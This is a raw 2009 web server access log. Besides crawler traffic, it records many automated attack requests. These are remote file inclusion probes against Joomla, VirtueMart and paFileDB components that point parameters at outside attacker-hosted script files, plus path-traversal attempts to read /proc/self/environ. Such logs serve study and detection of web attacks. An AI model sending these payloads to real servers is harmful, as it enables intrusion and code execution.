61.247.222.44 - - [14/May/2009:02:45:00 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
61.247.222.44 - - [14/May/2009:02:45:00 -0500] "GET /logs/access_log.1186358400 HTTP/1.1" 200 379 "-""Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
195.5.168.93 - - [14/May/2009:02:45:15 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://sherif.do.am/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.825"
195.5.168.93 - - [14/May/2009:02:45:15 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://sherif.do.am/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.825"
217.199.222.19 - - [14/May/2009:02:45:26 -0500] "GET /logs/access_log.1236816000/?custompluginfile[]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:02:45:26 -0500] "GET /logs/access_log.1233014400/?custompluginfile[]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:02:45:26 -0500] "GET /?custompluginfile[]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
217.199.222.19 - - [14/May/2009:02:45:33 -0500] "GET /logs/?custompluginfile[]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:02:45:59 -0500] "GET /logs/access_log.1180656000 HTTP/1.1" 200 3484 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.23.154.225 - - [14/May/2009:02:49:18 -0500] "GET /logs/index.php?option=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.154.225 - - [14/May/2009:02:49:18 -0500] "GET /index.php?option=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.154.225 - - [14/May/2009:02:49:19 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
65.23.154.225 - - [14/May/2009:02:49:19 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
65.23.154.225 - - [14/May/2009:02:49:19 -0500] "GET /logs/index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 297 "-""XXXXXX"
65.23.154.225 - - [14/May/2009:02:49:19 -0500] "GET /index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 292 "-""XXXXXX"
65.23.154.225 - - [14/May/2009:02:49:19 -0500] "GET /logs/index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""XXXXXX"
65.23.154.225 - - [14/May/2009:02:49:19 -0500] "GET /index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""XXXXXX"
66.249.67.180 - - [14/May/2009:02:51:14 -0500] "GET /logs/access_log.1200096000 HTTP/1.1" 200 641 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [14/May/2009:02:56:30 -0500] "GET /logs/access_log.1118275200 HTTP/1.1" 200 4611 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [14/May/2009:03:00:11 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.17.162.28 - - [14/May/2009:03:00:12 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:03:01:49 -0500] "GET /logs/access_log.1206230400 HTTP/1.1" 200 2381 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.214.86.93 - - [14/May/2009:03:04:16 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:03:04:16 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:03:04:16 -0500] "GET /logs/access_log.1235347200//convert/mvcw.php?step=1&vwar_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.178.197.14 - - [14/May/2009:03:04:34 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
62.178.197.14 - - [14/May/2009:03:04:34 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
65.55.106.124 - - [14/May/2009:03:05:29 -0500] "GET /_vti_cnf/?D=D HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.234.200.229 - - [14/May/2009:03:06:21 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
200.234.200.229 - - [14/May/2009:03:06:21 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
200.234.200.229 - - [14/May/2009:03:06:22 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 335 "-""XXXXXX"
200.234.200.229 - - [14/May/2009:03:06:22 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""XXXXXX"
200.234.200.229 - - [14/May/2009:03:06:25 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 330 "-""XXXXXX"
200.234.200.229 - - [14/May/2009:03:06:25 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""XXXXXX"
66.249.67.180 - - [14/May/2009:03:07:05 -0500] "GET /logs/access_log.1163894400 HTTP/1.1" 200 1500 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.117.191.71 - - [14/May/2009:03:08:26 -0500] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
216.117.191.71 - - [14/May/2009:03:08:26 -0500] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
217.18.76.16 - - [14/May/2009:03:08:52 -0500] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:03:08:52 -0500] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:03:09:25 -0500] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:03:09:25 -0500] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
66.249.67.180 - - [14/May/2009:03:12:25 -0500] "GET /logs/access_log.1209772800 HTTP/1.1" 200 813 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.117.191.71 - - [14/May/2009:03:12:48 -0500] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
216.117.191.71 - - [14/May/2009:03:12:48 -0500] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
217.18.76.16 - - [14/May/2009:03:12:53 -0500] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:03:12:54 -0500] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:03:13:36 -0500] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:03:13:36 -0500] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
173.23.160.236 - - [14/May/2009:03:14:22 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 354 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
173.23.160.236 - - [14/May/2009:03:14:22 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 349 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
173.23.160.236 - - [14/May/2009:03:14:22 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
173.23.160.236 - - [14/May/2009:03:14:22 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
173.23.160.236 - - [14/May/2009:03:14:22 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 349 "-""XXXXXX"
173.23.160.236 - - [14/May/2009:03:14:22 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 354 "-""XXXXXX"
173.23.160.236 - - [14/May/2009:03:14:22 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""XXXXXX"
173.23.160.236 - - [14/May/2009:03:14:23 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""XXXXXX"
65.55.106.123 - - [14/May/2009:03:15:00 -0500] "GET /logs/access_log.1138492800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.150.52.114 - - [14/May/2009:03:15:09 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://biquad.com.br/catalog/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:03:15:09 -0500] "GET /logs/access_log.1239235200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://biquad.com.br/catalog/copyright.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:03:15:09 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://biquad.com.br/catalog/copyright.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:03:15:28 -0500] "GET /logs/access_log.1239494400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://biquad.com.br/catalog/copyright.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:03:18:20 -0500] "GET /logs/access_log.1163376000 HTTP/1.1" 200 1570 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.210.20.19 - - [14/May/2009:03:21:33 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
82.210.20.19 - - [14/May/2009:03:21:33 -0500] "GET /include/lib.inc.php?site_path=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
66.249.67.180 - - [14/May/2009:03:22:55 -0500] "GET /logs/access_log.1180915200 HTTP/1.1" 200 2523 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.94.155.59 - - [14/May/2009:03:23:16 -0500] "GET /logs/access_log.1236643200/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:03:23:16 -0500] "GET /?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:03:23:21 -0500] "GET /logs/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
203.94.155.59 - - [14/May/2009:03:23:38 -0500] "GET /logs/access_log.1236988800/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:03:24:34 -0500] "GET ///skin/zero_vote/ask_password.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:03:24:34 -0500] "GET /logs/access_log.1235520000///skin/zero_vote/ask_password.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:03:24:34 -0500] "GET /logs///skin/zero_vote/ask_password.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:03:25:04 -0500] "GET /logs/access_log.1235865600///skin/zero_vote/ask_password.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:03:26:38 -0500] "GET //components/errors.php?error=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:03:26:38 -0500] "GET /logs/access_log.1238457600//components/errors.php?error=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:03:26:38 -0500] "GET /logs//components/errors.php?error=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.106.191 - - [14/May/2009:03:27:32 -0500] "GET /logs/access_log.1194307200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.1.64.133 - - [14/May/2009:03:27:53 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
218.1.64.133 - - [14/May/2009:03:27:53 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
218.1.64.133 - - [14/May/2009:03:27:53 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
218.1.64.133 - - [14/May/2009:03:27:54 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
218.1.64.133 - - [14/May/2009:03:27:54 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 318 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:03:27:54 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 313 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:03:27:54 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""XXXXXX"
218.1.64.133 - - [14/May/2009:03:27:55 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""XXXXXX"
66.249.67.180 - - [14/May/2009:03:28:15 -0500] "GET /logs/access_log.1201824000 HTTP/1.1" 200 154 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.173.130.41 - - [14/May/2009:03:29:34 -0500] "GET /?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:03:29:34 -0500] "GET /logs/access_log.1236643200/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:03:29:35 -0500] "GET /logs/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 189317 "-""Mozilla/5.0"
121.173.130.41 - - [14/May/2009:03:30:04 -0500] "GET /logs/access_log.1236988800/?spaw_root=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.208.143 - - [14/May/2009:03:30:33 -0500] "GET /logs/access_log.1227139200 HTTP/1.1" 200 37127 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [14/May/2009:03:30:33 -0500] "GET /logs/access_log.1223078400 HTTP/1.1" 200 11345 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [14/May/2009:03:30:33 -0500] "GET /logs/access_log.1182297600 HTTP/1.1" 200 1613 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [14/May/2009:03:30:33 -0500] "GET /logs/access_log.1224720000 HTTP/1.1" 200 21681 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [14/May/2009:03:30:34 -0500] "GET /logs/access_log.1121472000 HTTP/1.1" 200 462 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
207.57.79.26 - - [14/May/2009:03:32:43 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:32:43 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:32:56 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:32:56 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:33:26 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:33:26 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:33:27 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:33:27 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
66.249.67.180 - - [14/May/2009:03:33:30 -0500] "GET /logs/access_log.1152144000 HTTP/1.1" 200 6568 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.165 - - [14/May/2009:03:33:30 -0500] "GET /_vti_cnf/?D=D HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.57.79.26 - - [14/May/2009:03:33:31 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:33:32 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:33:32 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:33:32 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:34:00 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:34:01 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:34:17 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:34:17 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:34:31 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:34:31 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:35:43 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:35:43 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:03:38:11 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
